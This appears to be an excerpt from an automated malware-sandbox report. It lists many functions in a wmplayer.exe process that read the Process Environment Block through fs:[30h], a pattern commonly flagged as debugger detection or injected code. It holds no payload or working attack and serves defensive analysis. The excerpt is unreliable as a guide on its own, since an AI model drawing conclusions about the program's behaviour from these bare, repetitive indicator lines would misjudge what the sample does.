Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0382B136 mov eax, dword ptr fs:[00000030h]	6_2_0382B136
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0382B136 mov eax, dword ptr fs:[00000030h]	6_2_0382B136
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_03905152 mov eax, dword ptr fs:[00000030h]	6_2_03905152
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038C4144 mov eax, dword ptr fs:[00000030h]	6_2_038C4144
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038C4144 mov eax, dword ptr fs:[00000030h]	6_2_038C4144
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038C4144 mov ecx, dword ptr fs:[00000030h]	6_2_038C4144
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038C4144 mov eax, dword ptr fs:[00000030h]	6_2_038C4144
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038C4144 mov eax, dword ptr fs:[00000030h]	6_2_038C4144
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_03829148 mov eax, dword ptr fs:[00000030h]	6_2_03829148
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_03829148 mov eax, dword ptr fs:[00000030h]	6_2_03829148
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_03829148 mov eax, dword ptr fs:[00000030h]	6_2_03829148
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_03829148 mov eax, dword ptr fs:[00000030h]	6_2_03829148
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_03837152 mov eax, dword ptr fs:[00000030h]	6_2_03837152
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0382C156 mov eax, dword ptr fs:[00000030h]	6_2_0382C156
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_03836154 mov eax, dword ptr fs:[00000030h]	6_2_03836154
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_03836154 mov eax, dword ptr fs:[00000030h]	6_2_03836154
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0382F172 mov eax, dword ptr fs:[00000030h]	6_2_0382F172
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0382F172 mov eax, dword ptr fs:[00000030h]	6_2_0382F172
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0382F172 mov eax, dword ptr fs:[00000030h]	6_2_0382F172
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0382F172 mov eax, dword ptr fs:[00000030h]	6_2_0382F172
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0382F172 mov eax, dword ptr fs:[00000030h]	6_2_0382F172
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0382F172 mov eax, dword ptr fs:[00000030h]	6_2_0382F172
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0382F172 mov eax, dword ptr fs:[00000030h]	6_2_0382F172
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0382F172 mov eax, dword ptr fs:[00000030h]	6_2_0382F172
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0382F172 mov eax, dword ptr fs:[00000030h]	6_2_0382F172
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0382F172 mov eax, dword ptr fs:[00000030h]	6_2_0382F172
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0382F172 mov eax, dword ptr fs:[00000030h]	6_2_0382F172
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0382F172 mov eax, dword ptr fs:[00000030h]	6_2_0382F172
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0382F172 mov eax, dword ptr fs:[00000030h]	6_2_0382F172
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0382F172 mov eax, dword ptr fs:[00000030h]	6_2_0382F172
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0382F172 mov eax, dword ptr fs:[00000030h]	6_2_0382F172
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0382F172 mov eax, dword ptr fs:[00000030h]	6_2_0382F172
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0382F172 mov eax, dword ptr fs:[00000030h]	6_2_0382F172
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0382F172 mov eax, dword ptr fs:[00000030h]	6_2_0382F172
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0382F172 mov eax, dword ptr fs:[00000030h]	6_2_0382F172
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0382F172 mov eax, dword ptr fs:[00000030h]	6_2_0382F172
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0382F172 mov eax, dword ptr fs:[00000030h]	6_2_0382F172
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038C9179 mov eax, dword ptr fs:[00000030h]	6_2_038C9179
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0383208A mov eax, dword ptr fs:[00000030h]	6_2_0383208A
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0382D08D mov eax, dword ptr fs:[00000030h]	6_2_0382D08D
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_03835096 mov eax, dword ptr fs:[00000030h]	6_2_03835096
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0385D090 mov eax, dword ptr fs:[00000030h]	6_2_0385D090
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0385D090 mov eax, dword ptr fs:[00000030h]	6_2_0385D090
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0386909C mov eax, dword ptr fs:[00000030h]	6_2_0386909C
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038F60B8 mov eax, dword ptr fs:[00000030h]	6_2_038F60B8
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038F60B8 mov ecx, dword ptr fs:[00000030h]	6_2_038F60B8
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038470C0 mov eax, dword ptr fs:[00000030h]	6_2_038470C0
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038470C0 mov ecx, dword ptr fs:[00000030h]	6_2_038470C0
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038470C0 mov ecx, dword ptr fs:[00000030h]	6_2_038470C0
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038470C0 mov eax, dword ptr fs:[00000030h]	6_2_038470C0
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038470C0 mov ecx, dword ptr fs:[00000030h]	6_2_038470C0
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038470C0 mov ecx, dword ptr fs:[00000030h]	6_2_038470C0
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038470C0 mov eax, dword ptr fs:[00000030h]	6_2_038470C0
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038470C0 mov eax, dword ptr fs:[00000030h]	6_2_038470C0
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038470C0 mov eax, dword ptr fs:[00000030h]	6_2_038470C0
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038470C0 mov eax, dword ptr fs:[00000030h]	6_2_038470C0
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038470C0 mov eax, dword ptr fs:[00000030h]	6_2_038470C0
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038470C0 mov eax, dword ptr fs:[00000030h]	6_2_038470C0
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038470C0 mov eax, dword ptr fs:[00000030h]	6_2_038470C0
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038470C0 mov eax, dword ptr fs:[00000030h]	6_2_038470C0
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038470C0 mov eax, dword ptr fs:[00000030h]	6_2_038470C0
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038470C0 mov eax, dword ptr fs:[00000030h]	6_2_038470C0
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038470C0 mov eax, dword ptr fs:[00000030h]	6_2_038470C0
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038470C0 mov eax, dword ptr fs:[00000030h]	6_2_038470C0
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_039050D9 mov eax, dword ptr fs:[00000030h]	6_2_039050D9
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038AD0C0 mov eax, dword ptr fs:[00000030h]	6_2_038AD0C0
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038AD0C0 mov eax, dword ptr fs:[00000030h]	6_2_038AD0C0
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038B20DE mov eax, dword ptr fs:[00000030h]	6_2_038B20DE
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038590DB mov eax, dword ptr fs:[00000030h]	6_2_038590DB
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038550E4 mov eax, dword ptr fs:[00000030h]	6_2_038550E4
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038550E4 mov ecx, dword ptr fs:[00000030h]	6_2_038550E4
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0382A0E3 mov ecx, dword ptr fs:[00000030h]	6_2_0382A0E3
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038380E9 mov eax, dword ptr fs:[00000030h]	6_2_038380E9
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0382C0F0 mov eax, dword ptr fs:[00000030h]	6_2_0382C0F0
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038720F0 mov ecx, dword ptr fs:[00000030h]	6_2_038720F0
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0384E016 mov eax, dword ptr fs:[00000030h]	6_2_0384E016
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0384E016 mov eax, dword ptr fs:[00000030h]	6_2_0384E016
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0384E016 mov eax, dword ptr fs:[00000030h]	6_2_0384E016
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0384E016 mov eax, dword ptr fs:[00000030h]	6_2_0384E016
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0382A020 mov eax, dword ptr fs:[00000030h]	6_2_0382A020
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0382C020 mov eax, dword ptr fs:[00000030h]	6_2_0382C020
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038F903E mov eax, dword ptr fs:[00000030h]	6_2_038F903E
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038F903E mov eax, dword ptr fs:[00000030h]	6_2_038F903E
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038F903E mov eax, dword ptr fs:[00000030h]	6_2_038F903E
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038F903E mov eax, dword ptr fs:[00000030h]	6_2_038F903E
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_03832050 mov eax, dword ptr fs:[00000030h]	6_2_03832050
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038D705E mov ebx, dword ptr fs:[00000030h]	6_2_038D705E
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038D705E mov eax, dword ptr fs:[00000030h]	6_2_038D705E
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0385B052 mov eax, dword ptr fs:[00000030h]	6_2_0385B052
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_03905060 mov eax, dword ptr fs:[00000030h]	6_2_03905060
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_03841070 mov eax, dword ptr fs:[00000030h]	6_2_03841070
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_03841070 mov ecx, dword ptr fs:[00000030h]	6_2_03841070
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_03841070 mov eax, dword ptr fs:[00000030h]	6_2_03841070
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_03841070 mov eax, dword ptr fs:[00000030h]	6_2_03841070
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_03841070 mov eax, dword ptr fs:[00000030h]	6_2_03841070
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_03841070 mov eax, dword ptr fs:[00000030h]	6_2_03841070
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_03841070 mov eax, dword ptr fs:[00000030h]	6_2_03841070
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_03841070 mov eax, dword ptr fs:[00000030h]	6_2_03841070
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_03841070 mov eax, dword ptr fs:[00000030h]	6_2_03841070
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_03841070 mov eax, dword ptr fs:[00000030h]	6_2_03841070
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_03841070 mov eax, dword ptr fs:[00000030h]	6_2_03841070
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_03841070 mov eax, dword ptr fs:[00000030h]	6_2_03841070
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_03841070 mov eax, dword ptr fs:[00000030h]	6_2_03841070
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0385C073 mov eax, dword ptr fs:[00000030h]	6_2_0385C073
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038AD070 mov ecx, dword ptr fs:[00000030h]	6_2_038AD070
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038EF78A mov eax, dword ptr fs:[00000030h]	6_2_038EF78A
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038B97A9 mov eax, dword ptr fs:[00000030h]	6_2_038B97A9
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038BF7AF mov eax, dword ptr fs:[00000030h]	6_2_038BF7AF
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038BF7AF mov eax, dword ptr fs:[00000030h]	6_2_038BF7AF
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038BF7AF mov eax, dword ptr fs:[00000030h]	6_2_038BF7AF
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038BF7AF mov eax, dword ptr fs:[00000030h]	6_2_038BF7AF
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038BF7AF mov eax, dword ptr fs:[00000030h]	6_2_038BF7AF
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_039037B6 mov eax, dword ptr fs:[00000030h]	6_2_039037B6
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038307AF mov eax, dword ptr fs:[00000030h]	6_2_038307AF
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0385D7B0 mov eax, dword ptr fs:[00000030h]	6_2_0385D7B0
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0382F7BA mov eax, dword ptr fs:[00000030h]	6_2_0382F7BA
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0382F7BA mov eax, dword ptr fs:[00000030h]	6_2_0382F7BA
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0382F7BA mov eax, dword ptr fs:[00000030h]	6_2_0382F7BA
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0382F7BA mov eax, dword ptr fs:[00000030h]	6_2_0382F7BA
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0382F7BA mov eax, dword ptr fs:[00000030h]	6_2_0382F7BA
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0382F7BA mov eax, dword ptr fs:[00000030h]	6_2_0382F7BA
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0382F7BA mov eax, dword ptr fs:[00000030h]	6_2_0382F7BA
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0382F7BA mov eax, dword ptr fs:[00000030h]	6_2_0382F7BA
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0382F7BA mov eax, dword ptr fs:[00000030h]	6_2_0382F7BA
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0383C7C0 mov eax, dword ptr fs:[00000030h]	6_2_0383C7C0
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038357C0 mov eax, dword ptr fs:[00000030h]	6_2_038357C0
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038357C0 mov eax, dword ptr fs:[00000030h]	6_2_038357C0
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038357C0 mov eax, dword ptr fs:[00000030h]	6_2_038357C0
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0383D7E0 mov ecx, dword ptr fs:[00000030h]	6_2_0383D7E0
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038527ED mov eax, dword ptr fs:[00000030h]	6_2_038527ED
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038527ED mov eax, dword ptr fs:[00000030h]	6_2_038527ED
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038527ED mov eax, dword ptr fs:[00000030h]	6_2_038527ED
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038347FB mov eax, dword ptr fs:[00000030h]	6_2_038347FB
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038347FB mov eax, dword ptr fs:[00000030h]	6_2_038347FB
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_03837703 mov eax, dword ptr fs:[00000030h]	6_2_03837703
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_03835702 mov eax, dword ptr fs:[00000030h]	6_2_03835702
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_03835702 mov eax, dword ptr fs:[00000030h]	6_2_03835702
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0386C700 mov eax, dword ptr fs:[00000030h]	6_2_0386C700
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_03830710 mov eax, dword ptr fs:[00000030h]	6_2_03830710
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_03860710 mov eax, dword ptr fs:[00000030h]	6_2_03860710
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0386F71F mov eax, dword ptr fs:[00000030h]	6_2_0386F71F
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0386F71F mov eax, dword ptr fs:[00000030h]	6_2_0386F71F
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038EF72E mov eax, dword ptr fs:[00000030h]	6_2_038EF72E
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_03833720 mov eax, dword ptr fs:[00000030h]	6_2_03833720
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0384F720 mov eax, dword ptr fs:[00000030h]	6_2_0384F720
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0384F720 mov eax, dword ptr fs:[00000030h]	6_2_0384F720
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0384F720 mov eax, dword ptr fs:[00000030h]	6_2_0384F720
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038F972B mov eax, dword ptr fs:[00000030h]	6_2_038F972B
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0386C720 mov eax, dword ptr fs:[00000030h]	6_2_0386C720
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0386C720 mov eax, dword ptr fs:[00000030h]	6_2_0386C720
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0390B73C mov eax, dword ptr fs:[00000030h]	6_2_0390B73C
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0390B73C mov eax, dword ptr fs:[00000030h]	6_2_0390B73C
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0390B73C mov eax, dword ptr fs:[00000030h]	6_2_0390B73C
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0390B73C mov eax, dword ptr fs:[00000030h]	6_2_0390B73C
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_03829730 mov eax, dword ptr fs:[00000030h]	6_2_03829730
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_03829730 mov eax, dword ptr fs:[00000030h]	6_2_03829730
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_03865734 mov eax, dword ptr fs:[00000030h]	6_2_03865734
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0383973A mov eax, dword ptr fs:[00000030h]	6_2_0383973A
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0383973A mov eax, dword ptr fs:[00000030h]	6_2_0383973A
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0386273C mov eax, dword ptr fs:[00000030h]	6_2_0386273C
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0386273C mov ecx, dword ptr fs:[00000030h]	6_2_0386273C
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0386273C mov eax, dword ptr fs:[00000030h]	6_2_0386273C
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038AC730 mov eax, dword ptr fs:[00000030h]	6_2_038AC730
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_03843740 mov eax, dword ptr fs:[00000030h]	6_2_03843740
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_03843740 mov eax, dword ptr fs:[00000030h]	6_2_03843740
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_03843740 mov eax, dword ptr fs:[00000030h]	6_2_03843740
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0386674D mov esi, dword ptr fs:[00000030h]	6_2_0386674D
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0386674D mov eax, dword ptr fs:[00000030h]	6_2_0386674D
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0386674D mov eax, dword ptr fs:[00000030h]	6_2_0386674D
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_03830750 mov eax, dword ptr fs:[00000030h]	6_2_03830750
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_03872750 mov eax, dword ptr fs:[00000030h]	6_2_03872750
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_03872750 mov eax, dword ptr fs:[00000030h]	6_2_03872750
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_03903749 mov eax, dword ptr fs:[00000030h]	6_2_03903749
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038B4755 mov eax, dword ptr fs:[00000030h]	6_2_038B4755
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0382B765 mov eax, dword ptr fs:[00000030h]	6_2_0382B765
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0382B765 mov eax, dword ptr fs:[00000030h]	6_2_0382B765
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0382B765 mov eax, dword ptr fs:[00000030h]	6_2_0382B765
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0382B765 mov eax, dword ptr fs:[00000030h]	6_2_0382B765
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_03838770 mov eax, dword ptr fs:[00000030h]	6_2_03838770
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_03840770 mov eax, dword ptr fs:[00000030h]	6_2_03840770
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_03840770 mov eax, dword ptr fs:[00000030h]	6_2_03840770
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_03840770 mov eax, dword ptr fs:[00000030h]	6_2_03840770
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_03840770 mov eax, dword ptr fs:[00000030h]	6_2_03840770
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_03840770 mov eax, dword ptr fs:[00000030h]	6_2_03840770
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_03840770 mov eax, dword ptr fs:[00000030h]	6_2_03840770
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_03840770 mov eax, dword ptr fs:[00000030h]	6_2_03840770
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_03840770 mov eax, dword ptr fs:[00000030h]	6_2_03840770
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_03840770 mov eax, dword ptr fs:[00000030h]	6_2_03840770
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_03840770 mov eax, dword ptr fs:[00000030h]	6_2_03840770
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_03840770 mov eax, dword ptr fs:[00000030h]	6_2_03840770
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_03840770 mov eax, dword ptr fs:[00000030h]	6_2_03840770
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038B368C mov eax, dword ptr fs:[00000030h]	6_2_038B368C
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038B368C mov eax, dword ptr fs:[00000030h]	6_2_038B368C
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038B368C mov eax, dword ptr fs:[00000030h]	6_2_038B368C
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_038B368C mov eax, dword ptr fs:[00000030h]	6_2_038B368C
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_03834690 mov eax, dword ptr fs:[00000030h]	6_2_03834690
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_03834690 mov eax, dword ptr fs:[00000030h]	6_2_03834690
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0386C6A6 mov eax, dword ptr fs:[00000030h]	6_2_0386C6A6
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0382D6AA mov eax, dword ptr fs:[00000030h]	6_2_0382D6AA
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0382D6AA mov eax, dword ptr fs:[00000030h]	6_2_0382D6AA
